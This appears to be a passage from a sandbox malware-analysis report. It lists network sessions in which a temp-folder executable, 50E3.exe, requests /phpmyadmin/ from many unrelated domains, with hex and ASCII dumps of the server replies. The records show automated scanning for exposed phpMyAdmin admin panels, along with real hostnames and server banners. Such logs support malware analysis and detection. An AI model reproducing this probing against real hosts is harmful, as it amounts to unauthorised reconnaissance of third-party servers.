2023-11-30 10:22:38 UTC	1248	IN	Data Raw: 34 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 68 70 4d 79 41 64 6d 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 Data Ascii: 4d4<!DOCTYPE HTML><html lang="en" dir="ltr"><head> <link rel="icon" href="favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"> <title>phpMyAdmin</title> <meta charset="utf-8"> <style t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	53633	3.33.224.147	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:38 UTC	156	OUT	GET / HTTP/1.1 Host: hna.be Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	409	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 33 30 30 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 30 62 37 30 37 62 30 63 37 34 37 61 62 32 63 33 66 62 33 39 63 66 37 35 61 61 36 39 31 62 30 30 Data Ascii: HTTP/1.1 200 OKServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: max-age=300, privateDate: Thu, 30 Nov 2023 10:22:38 GMTETag: "0b707b0c747ab2c3fb39cf75aa691b00
2023-11-30 10:22:38 UTC	15975	IN	Data Raw: 31 66 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 70 61 72 6b 69 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 Data Ascii: 1f18<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta property="environment" content="parking"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-widt
2023-11-30 10:22:38 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 69 6e 71 75 69 72 79 5f 65 6d 61 69 6c 22 20 63 6c 61 73 73 3d 22 77 2d 6d 69 6e 20 77 68 69 74 65 73 70 61 63 65 2d 6e 6f 77 72 61 70 20 74 65 78 74 2d 5b 31 35 70 78 5d 20 6c 65 61 64 69 6e 67 2d 5b 31 38 70 78 5d 20 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 20 74 65 78 74 2d 67 72 61 79 2d 37 0d 0a 32 30 30 30 0d 0a 30 30 20 21 74 65 78 74 2d 5b 31 34 70 78 5d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 6d 61 69 6c 26 6e 62 73 70 Data Ascii: <div class="flex flex-col"> <label for="inquiry_email" class="w-min whitespace-nowrap text-[15px] leading-[18px] font-semibold text-gray-7200000 !text-[14px]"> Email&nbsp
2023-11-30 10:22:38 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4c 54 22 20 3e 4c 54 20 2d 20 4c 69 74 68 75 61 6e 69 61 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4c 55 22 20 3e 4c 55 20 2d 20 4c 75 78 65 6d 62 6f 75 72 67 3c 2f 6f 70 0d 0a 31 30 30 30 0d 0a 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <option value="LT" >LT - Lithuania</option> <option value="LU" >LU - Luxembourg</op1000tion>
2023-11-30 10:22:38 UTC	7924	IN	Data Raw: 6e 65 20 66 6f 63 75 73 3a 72 69 6e 67 2d 32 20 66 6f 63 75 73 3a 72 69 6e 67 2d 70 72 69 6d 61 72 79 2d 6c 69 67 68 74 20 66 6f 63 75 73 3a 62 6f 72 64 65 72 20 66 6f 63 75 73 3a 62 6f 72 64 65 72 2d 70 72 69 6d 61 72 79 20 64 69 73 61 62 6c 65 64 3a 63 75 72 73 6f 72 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 20 64 69 73 61 62 6c 65 64 3a 62 67 2d 67 72 61 79 2d 31 30 30 20 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 3a 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 20 72 6f 75 6e 64 65 64 2d 6d 64 20 73 68 61 64 6f 77 2d 73 6d 20 68 6f 76 65 72 3a 73 68 61 64 6f 77 20 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 3a 73 68 61 64 6f 77 2d 73 6d 20 21 68 2d 5b 33 36 70 78 5d 20 66 6f 63 75 73 3a 21 72 69 6e 67 2d 62 6c 75 65 2d 32 30 30 20 66 6f 63 75 73 3a 21 62 6f 72 Data Ascii: ne focus:ring-2 focus:ring-primary-light focus:border focus:border-primary disabled:cursor-not-allowed disabled:bg-gray-100 disabled:hover:border-gray-300 rounded-md shadow-sm hover:shadow disabled:hover:shadow-sm !h-[36px] focus:!ring-blue-200 focus:!bor

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	52834	194.63.248.47	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:38 UTC	168	OUT	GET /phpmyadmin/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	180	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:38 GMTServer: Apache/2.4.25 (Debian)Content-Length: 270Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:38 UTC	270	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 443</address>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	52953	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:38 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:38 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:38 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	54505	104.238.144.219	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:38 UTC	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	803	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 33 33 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 31 30 38 30 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 68 70 4d 79 41 64 6d 69 6e 5f Data Ascii: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:22:38 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6X-Powered-By: PHP/7.4.33Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: private, max-age=10800Set-Cookie: phpMyAdmin_
2023-11-30 10:22:38 UTC	1248	IN	Data Raw: 34 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 68 70 4d 79 41 64 6d 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 Data Ascii: 4d4<!DOCTYPE HTML><html lang="en" dir="ltr"><head> <link rel="icon" href="favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"> <title>phpMyAdmin</title> <meta charset="utf-8"> <style t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	52891	3.64.163.50	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:38 UTC	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gcann.cr.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	149	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 31 30 20 47 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 410 GoneServer: openrestyDate: Thu, 30 Nov 2023 10:22:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
2023-11-30 10:22:38 UTC	140	IN	Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 62 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 67 63 61 6e 6e 2e 63 72 2e 63 6f 2e 75 6b 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>4b <meta http-equiv='refresh' content='0; url=https://gcann.cr.co.uk/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	52952	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:38 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:38 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:38 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	52840	3.64.163.50	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:38 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gmo.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	149	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 31 30 20 47 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 410 GoneServer: openrestyDate: Thu, 30 Nov 2023 10:22:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
2023-11-30 10:22:38 UTC	132	IN	Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 33 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 67 6d 6f 2e 75 6b 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>43 <meta http-equiv='refresh' content='0; url=https://gmo.uk/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	52851	104.247.82.52	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:38 UTC	166	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cm.cz Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	855	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 43 68 3a 20 76 69 65 77 70 6f 72 74 2d 77 69 64 74 68 0d 0a 41 63 63 65 70 74 2d 43 68 3a 20 64 70 72 0d 0a 41 63 63 65 70 74 2d 43 68 3a 20 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 0d 0a 41 63 63 65 70 74 2d 43 68 3a 20 72 74 74 0d 0a 41 63 63 65 70 74 2d 43 68 3a 20 64 6f 77 6e 6c 69 6e 6b 0d 0a 41 63 63 65 70 74 2d 43 68 3a 20 65 63 74 0d 0a 41 63 63 65 70 74 2d 43 68 3a 20 75 61 0d 0a 41 63 63 65 70 74 2d 43 68 3a 20 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 0d 0a 41 63 63 65 70 74 2d 43 68 3a 20 75 61 2d 70 6c 61 74 66 6f 72 6d 0d 0a 41 63 63 65 70 74 2d 43 68 3a 20 75 61 2d 70 6c 61 74 66 6f 72 6d 2d 76 65 72 73 69 6f 6e 0d 0a 41 63 63 65 70 74 2d 43 68 3a 20 75 61 2d 61 72 63 Data Ascii: HTTP/1.1 200 OKAccept-Ch: viewport-widthAccept-Ch: dprAccept-Ch: device-memoryAccept-Ch: rttAccept-Ch: downlinkAccept-Ch: ectAccept-Ch: uaAccept-Ch: ua-full-versionAccept-Ch: ua-platformAccept-Ch: ua-platform-versionAccept-Ch: ua-arc
2023-11-30 10:22:38 UTC	331	IN	Data Raw: 34 31 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 6e 68 7a 37 6a 73 63 6c 47 41 72 55 6d 6d 62 6f 4b 44 49 56 30 6e 67 53 4a 61 37 79 44 72 38 46 2b 6b 6c 47 2f 48 49 58 2b 50 59 6e 34 39 30 6e 33 46 77 59 63 64 73 65 45 6b 73 31 35 44 75 6a 31 53 6b 5a 41 6b 32 78 74 70 37 74 55 35 6a 35 7a Data Ascii: 414f<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_nhz7jsclGArUmmboKDIV0ngSJa7yDr8F+klG/HIX+PYn490n3FwYcdseEks15Duj1SkZAk2xtp7tU5j5z
2023-11-30 10:22:38 UTC	2372	IN	Data Raw: 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 63 6d 2e 63 7a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 Data 